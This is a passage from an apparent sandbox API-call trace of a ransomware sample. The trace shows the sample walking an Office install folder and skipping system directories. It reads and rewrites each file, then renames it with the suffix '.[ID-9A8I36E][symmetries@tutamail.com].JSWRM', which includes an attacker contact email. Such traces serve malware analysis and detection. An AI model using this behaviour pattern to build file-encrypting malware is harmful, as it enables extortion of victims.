lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0116.540] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0116.540] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PROTTPLV.XLS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\prottplv.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0116.540] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=8704) returned 1 [0116.541] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.541] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2200) returned 0x24c1d0 [0116.541] ReadFile (in: hFile=0x238, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2200, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x2200, lpOverlapped=0x0) returned 1 [0116.550] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.550] WriteFile (in: hFile=0x238, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2200, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x2200, lpOverlapped=0x0) returned 1 [0116.550] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0116.550] CloseHandle (hObject=0x238) returned 1 [0116.550] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0116.550] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0116.550] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0116.550] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0116.550] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0116.550] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0116.550] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0116.550] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0116.550] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0116.550] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0116.551] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0116.551] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0116.551] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0116.551] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0116.551] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0116.551] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0116.551] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PROTTPLV.XLS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\prottplv.xls"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PROTTPLV.XLS.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\prottplv.xls.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0116.552] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0116.552] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0116.552] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0116.552] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xa31ce71, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xa31ce71, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xa3430bd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4f777, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="PSRCHKEY.DAT", cAlternateFileName="")) returned 1 [0116.552] lstrcmpiW (lpString1="PSRCHKEY.DAT", lpString2=".") returned 1 [0116.552] lstrcmpiW (lpString1="PSRCHKEY.DAT", lpString2="..") returned 1 [0116.552] lstrcmpiW (lpString1="PSRCHKEY.DAT", lpString2="...") returned 1 [0116.552] lstrcmpiW (lpString1="PSRCHKEY.DAT", lpString2="windows") returned -1 [0116.552] lstrcmpiW (lpString1="PSRCHKEY.DAT", lpString2="recovery") returned -1 [0116.552] lstrcmpiW (lpString1="PSRCHKEY.DAT", lpString2="perflogs") returned 1 [0116.552] lstrcmpiW (lpString1="PSRCHKEY.DAT", lpString2="documents and settings") returned 1 [0116.552] lstrcmpiW (lpString1="PSRCHKEY.DAT", lpString2="$RECYCLE.BIN") returned 1 [0116.552] lstrcmpiW (lpString1="PSRCHKEY.DAT", lpString2="system volume information") returned -1 [0116.552] lstrcmpiW (lpString1="PSRCHKEY.DAT", lpString2="msocache") returned 1 [0116.552] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0116.552] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PSRCHKEY.DAT", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0116.552] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PSRCHKEY.DAT", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PSRCHKEY.DAT", lpUsedDefaultChar=0x0) returned 12 [0116.552] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0116.552] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0116.552] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PSRCHKEY.DAT", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0116.552] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PSRCHKEY.DAT", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PSRCHKEY.DAT", lpUsedDefaultChar=0x0) returned 12 [0116.552] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0116.552] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0116.552] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0116.552] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0116.552] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0116.552] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0116.552] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PSRCHKEY.DAT" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\psrchkey.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0116.553] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=325495) returned 1 [0116.553] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.553] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24c1d0 [0116.553] ReadFile (in: hFile=0x238, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0116.567] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.567] WriteFile (in: hFile=0x238, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0116.568] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0116.568] CloseHandle (hObject=0x238) returned 1 [0116.568] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0116.568] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0116.568] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0116.568] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0116.568] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0116.568] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0116.568] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0116.568] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0116.568] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0116.568] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0116.568] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0116.568] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0116.568] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0116.568] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0116.568] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0116.568] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0116.568] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PSRCHKEY.DAT" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\psrchkey.dat"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PSRCHKEY.DAT.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\psrchkey.dat.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0116.569] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0116.569] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0116.569] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0116.569] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xa31ce71, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xa31ce71, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xacf29e7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1f3978, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="PSRCHLEX.DAT", cAlternateFileName="")) returned 1 [0116.569] lstrcmpiW (lpString1="PSRCHLEX.DAT", lpString2=".") returned 1 [0116.569] lstrcmpiW (lpString1="PSRCHLEX.DAT", lpString2="..") returned 1 [0116.569] lstrcmpiW (lpString1="PSRCHLEX.DAT", lpString2="...") returned 1 [0116.569] lstrcmpiW (lpString1="PSRCHLEX.DAT", lpString2="windows") returned -1 [0116.569] lstrcmpiW (lpString1="PSRCHLEX.DAT", lpString2="recovery") returned -1 [0116.570] lstrcmpiW (lpString1="PSRCHLEX.DAT", lpString2="perflogs") returned 1 [0116.570] lstrcmpiW (lpString1="PSRCHLEX.DAT", lpString2="documents and settings") returned 1 [0116.570] lstrcmpiW (lpString1="PSRCHLEX.DAT", lpString2="$RECYCLE.BIN") returned 1 [0116.570] lstrcmpiW (lpString1="PSRCHLEX.DAT", lpString2="system volume information") returned -1 [0116.570] lstrcmpiW (lpString1="PSRCHLEX.DAT", lpString2="msocache") returned 1 [0116.570] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0116.570] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PSRCHLEX.DAT", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0116.570] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PSRCHLEX.DAT", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PSRCHLEX.DAT", lpUsedDefaultChar=0x0) returned 12 [0116.570] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0116.570] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0116.570] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PSRCHLEX.DAT", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0116.570] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PSRCHLEX.DAT", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PSRCHLEX.DAT", lpUsedDefaultChar=0x0) returned 12 [0116.570] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0116.570] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0116.570] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0116.570] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0116.570] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0116.570] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0116.570] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PSRCHLEX.DAT" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\psrchlex.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0116.571] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2046328) returned 1 [0116.571] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.571] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24c1d0 [0116.571] ReadFile (in: hFile=0x238, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0116.612] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.612] WriteFile (in: hFile=0x238, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0116.612] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0116.612] CloseHandle (hObject=0x238) returned 1 [0116.612] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0116.612] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0116.612] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0116.612] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0116.612] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0116.612] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0116.612] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0116.612] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0116.612] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0116.612] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0116.613] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0116.613] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0116.613] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0116.613] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0116.613] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0116.613] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0116.613] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PSRCHLEX.DAT" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\psrchlex.dat"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PSRCHLEX.DAT.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\psrchlex.dat.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0116.614] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0116.614] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0116.614] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0116.614] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xa38f59d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xa38f59d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xa3b57c1, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xcd64, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="PSRCHLTS.DAT", cAlternateFileName="")) returned 1 [0116.614] lstrcmpiW (lpString1="PSRCHLTS.DAT", lpString2=".") returned 1 [0116.614] lstrcmpiW (lpString1="PSRCHLTS.DAT", lpString2="..") returned 1 [0116.614] lstrcmpiW (lpString1="PSRCHLTS.DAT", lpString2="...") returned 1 [0116.614] lstrcmpiW (lpString1="PSRCHLTS.DAT", lpString2="windows") returned -1 [0116.614] lstrcmpiW (lpString1="PSRCHLTS.DAT", lpString2="recovery") returned -1 [0116.614] lstrcmpiW (lpString1="PSRCHLTS.DAT", lpString2="perflogs") returned 1 [0116.614] lstrcmpiW (lpString1="PSRCHLTS.DAT", lpString2="documents and settings") returned 1 [0116.614] lstrcmpiW (lpString1="PSRCHLTS.DAT", lpString2="$RECYCLE.BIN") returned 1 [0116.614] lstrcmpiW (lpString1="PSRCHLTS.DAT", lpString2="system volume information") returned -1 [0116.614] lstrcmpiW (lpString1="PSRCHLTS.DAT", lpString2="msocache") returned 1 [0116.614] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0116.614] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PSRCHLTS.DAT", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0116.614] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PSRCHLTS.DAT", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PSRCHLTS.DAT", lpUsedDefaultChar=0x0) returned 12 [0116.614] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0116.614] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0116.615] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PSRCHLTS.DAT", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0116.615] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PSRCHLTS.DAT", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PSRCHLTS.DAT", lpUsedDefaultChar=0x0) returned 12 [0116.615] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0116.615] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0116.615] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0116.615] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0116.615] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0116.615] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0116.615] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PSRCHLTS.DAT" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\psrchlts.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0116.615] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=52580) returned 1 [0116.615] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.616] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xcd60) returned 0x24c1d0 [0116.616] ReadFile (in: hFile=0x238, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0xcd60, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0xcd60, lpOverlapped=0x0) returned 1 [0116.620] SetFilePointer (in: 